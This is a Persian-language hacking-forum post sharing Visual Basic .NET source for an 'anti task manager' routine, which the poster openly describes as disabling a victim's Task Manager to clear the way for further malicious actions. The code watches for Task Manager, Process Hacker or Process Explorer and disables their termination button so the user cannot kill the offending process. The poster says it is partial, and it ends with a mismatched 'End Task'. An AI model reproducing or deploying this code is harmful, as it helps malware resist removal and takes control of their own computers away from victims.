پرش به

 • تبلیغات تبلیغات تبلیغات تبلیغات تبلیغات تبلیغات
  تصویر

  anti task manager


  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
  بدون پاسخ

  #1

  alizombie

  با سلام خدمت شما دوستان گرامی

  در این تاپیک میخواهم سورس برنامه ای در vb که خودم مدت ها دنبال ان بودم قرار دهم...... چون اکثر ویروس های اولیه

  در تسک منیجر نمایش داده می شد :D

  شما با این برنامه میتوانید تسک منیجر قربانی را غیر فعال کنید ورا را برای اقدامات بعدی شما باز میکند

   

  این سورس به زبان vb است که انرا از یک دوست انگلیسی به زحمت گرفتم ....البته این همه ی سورس نیست B)

  اینم از سورس برنامه:

  1.  
  2. Public Class AntiTaskManager
  3. <Runtime.InteropServices.DllImport("user32.dll")> _
  4. Private Shared Function EnableWindow(ByVal hWnd As IntPtr, ByVal bEnable As Boolean) As Boolean
  5. End Function
  6. Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As _
  7. IntPtr, ByRef lpdwProcessID As Integer) As Integer
  8. Private Declare Function GetForegroundWindow Lib "user32.dll" () As IntPtr
  9. Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As _
  10. Integer, ByVal lpClassName As String, ByVal nMaxCount As Integer) As Integer
  11. Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal _
  12. hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As String) As Integer
  13. Private Declare Auto Function GetWindowText Lib "user32.dll" (ByVal hwnd As Int32, _
  14. ByVal lpString As System.Text.StringBuilder, ByVal cch As Int32) As Int32
  15. Private Declare Auto Function GetWindowTextLength Lib "user32.dll" (ByVal hwnd As Int32) As Int32
  16. Private Delegate Function EnumWindProc(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
  17. Private Delegate Function EnumChildWindProc(ByVal hWnd As Int32, ByVal _
  18. lParam As Int32) As Boolean
  19. Private Declare Function EnumChildWindows Lib "user32" (ByVal hWnd As IntPtr, _
  20. ByVal lpEnumFunc As EnumWindProc, ByRef lParam As IntPtr) As Int32
  21. Private Function EnumChild(ByVal hWnd As Int32, ByVal lParam As Int32) As Boolean
  22. CLD.Add(hWnd)
  23. Return True
  24. End Function
  25. Public Sub protect()
  26. While True
  27. Threading.Thread.Sleep(0)
  28. Dim hwd = GetForegroundWindow
  29. If hwd.ToInt32 = 0 Then Continue While
  30. Dim id As Integer = 0
  31. GetWindowThreadProcessId(hwd, id)
  32. If id > 0 Then
  33. Dim Title As String = ""
  34. Dim text_len As Integer = GetWindowTextLength(hwd)
  35. If text_len = 0 Then
  36. Title = ""
  37. Else
  38. Dim sb As New System.Text.StringBuilder(text_len + 1)
  39. Dim ret = GetWindowText(hwd, sb, sb.Capacity)
  40. If ret = 0 Then
  41. Title = ""
  42. Else
  43. Title = sb.ToString
  44. End If
  45. End If
  46. Dim p As Process = Process.GetProcessById(id)
  47. If p.ProcessName.ToLower = "taskmgr" Or p.ProcessName.ToLower _
  48. = "processhacker" Or Title.ToLower = "process explorer" Then
  49. Dim button As New List(Of IntPtr)
  50. Dim statics As Integer = 0
  51. For Each x As IntPtr In GetChild(hwd)
  52. Dim className As String = Space(200)
  53. Dim ln As Integer = GetClassName(x, className, 200)
  54. className = className.Remove(ln, 200 - ln)
  55. If className.ToLower = "button" Then
  56. button.Add(x)
  57. End If
  58. If className.ToLower = "static" Or className.ToLower _
  59. = "directuihwnd" Then
  60. statics += 1
  61. End If
  62. Next
  63. If button.Count = 2 And (statics = 2 Or statics = 1) Then
  64. EnableWindow(button(0), False)
  65. SendMessage(button(0), &HC, 0, "")
  66. End If
  67. End If
  68. End If
  69. End While
  70. End Sub
  71. Private CLD As New List(Of IntPtr)
  72. Private Function GetChild(ByVal hwd As IntPtr) As IntPtr()
  73. SyncLock Me
  74. CLD.Clear()
  75. EnumChildWindows(hwd, New EnumWindProc(AddressOf EnumChild), 0)
  76. Return CLD.ToArray
  77. End SyncLock
  78. End Function
  79. End Task

  اگر سوالی داشتید و خوش حال میشوم که بتوانم به شما کمکی کنم پس در  تاپیک سوال  ها ..سوال خود را اعلام کنید تا به شما پاسخ دهم و

  تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد مطالب بهتر و جدید تر به شما اموزش خواهم داد

  با تشکر B)


  • MR.FIXER و RADIKAL از این پست تشکر شده است
  0 کاربر در حال خواندن این موضوع است

  0 کاربر، 0 مهمان و 0 عضو مخفی